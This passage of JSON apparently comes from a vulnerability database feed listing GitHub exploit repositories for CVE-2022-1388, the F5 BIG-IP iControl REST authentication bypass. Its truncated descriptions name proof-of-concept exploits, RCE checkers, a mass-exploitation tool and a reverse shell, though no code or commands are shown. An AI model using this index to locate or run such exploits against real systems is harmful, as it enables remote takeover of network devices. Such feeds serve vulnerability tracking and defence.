"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T15:44:50", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-11T08:36:43", "id": "28EB1599-0E12-5ECA-8368-08DD51291F7F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-16T05:17:47", "description": "# CVE-2022-1388 F5 BIG-IP RCE \u591a\u7ebf\u7a0b\u68c0\u6d4b\nuse\uff1a\n\n```\n\u5355\u4e2aurl:\npython3 CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T05:30:11", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-16T05:09:43", "id": "A160DC38-C6E4-5C85-9F98-4BC04D80FCD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2022-06-14T15:50:10", "description": "# CVE-2022-1388-Exploit\nTest and Exploit Scripts for CVE 2022-13...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T15:16:12", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-14T13:15:36", "id": "1405211A-94E2-5ECA-BF96-441D2FF564CB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-23T20:07:29", "description": "# CVE-2022-1388\nPOC for CVE-2022-1388 affecting multiple F5 prod...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-05-09T11:46:45", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-23T19:08:19", "id": "1406F2B7-7907-5BCF-947E-0DB31B9F014C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-11T01:09:27", "description": "# CVE-2022-1388\nCVE-2022-1388 POC exploit\n\n# Usage\n```shell\nusag...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T15:42:55", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T21:07:51", "id": "07F0F779-CBA8-507A-8268-EFD213F50D06", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-13T22:09:58", "description": "# CVE-2022-1388\nCVE-2022-13...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T14:37:04", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T14:39:16", "id": "1E5E8601-B107-5E10-BB37-0A7C7BB2926D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:13:08", "description": "# CVE-2022-1388-EXP\nThis is CVE-2022-1388-EXP\nAuthor:Caps@BUGFOR...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T08:09:30", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T13:06:26", "id": "C39D4BF6-5B98-5653-AA56-8DC5F53FEDA7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-07T17:49:33", "description": "# CVE-2022-1388-POC\nBIG-IP iCONTROL REST API AUTH BYPASS /RCE EX...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T14:55:45", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-07T16:46:52", "id": "17B2C229-06F1-5A30-9E3A-ED9E23DA3F13", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T16:59:14", "description": "# cve-2022-1388-mass\nbig-ip icontrol rest auth bypass RCE MASS w...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T14:57:31", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-11T15:02:07", "id": 
"91380AB1-864A-5C58-B9BE-88541D8E0911", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:12:57", "description": "# CVE-2022-1388-RCE-chec...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:34:28", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T17:34:39", "id": "F7396B72-9692-5E12-8893-FFE6A091B496", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:12:59", "description": "# CVE-2022-1388\n\nF5 BIG-IP Unauthenticated RCE Vulnerability\n\nF5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T15:24:27", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T16:10:58", "id": "4AA50D81-1CFC-5DDC-804E-F50243E3E9C7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-21T15:27:20", "description": "# CVE-2022-1388\nBIG-IP iControl REST vulnerability CVE-2022-1388...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T10:06:11", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-06-21T09:37:19", "id": "EC7A045E-54CB-5327-8755-53F82B91F56D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-10T19:13:04", "description": "# CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T04:51:06", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T05:01:29", "id": "1BF999D3-0E32-5C04-820B-BB91E950147C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-12T17:01:14", "description": "# CVE-2022-1388 RCE checker\n\nSimple bash script to check CVE-202...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-08T09:28:19", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T12:40:23", "id": "1A3F2735-FB81-52A4-BF5F-FD8A728C3CA9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-09T16:09:05", "description": "# CVE-2022-1388 F5 BIG-IP RCE \u591a\u7ebf\u7a0b\u68c0\u6d4b\nuse\uff1a\n\n```\n\u5355\u4e2aurl:\npython3 CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T14:09:34", "type": "githubexploit", "title": "Exploit for Missing 
Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-09T15:27:25", "id": "E479356B-3D07-5131-8A34-4C6FD67776AB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:03:44", "description": "# Exploit-F5-CVE-2022-1388\nPoC For F5 BIG-IP - bash script Explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-28T12:43:18", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-28T12:43:29", "id": "0B2EA860-8578-5853-85A4-F3302749F815", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-25T19:51:28", "description": "# F5 BIG-IP iControl REST \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2022-1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T07:24:33", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-25T11:40:03", "id": "F37EDD30-724E-584E-9C9E-9B3E8C4C849C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T16:17:38", "description": "# CVE-2022-1388\nF5 BIG-IP iControl REST\u8eab\u4efd\u9a8c\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e\n\n\n# Optional Arg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T14:02:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-15T13:30:09", "id": "1B09A058-8036-572B-905F-1054D924243B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T07:10:57", "description": "# F5-BigIP-CVE-2022-1388\nReverse Shell for CVE-2022-1388\n\n**** D...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T04:44:05", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-15T02:58:27", "id": "CD47935C-F8CB-535E-9535-E95B6AE9A0FC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:35:17", "description": "# CVE-2022-1388\nCVE-2022-1388 is a critical vulnerability (CVSS ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 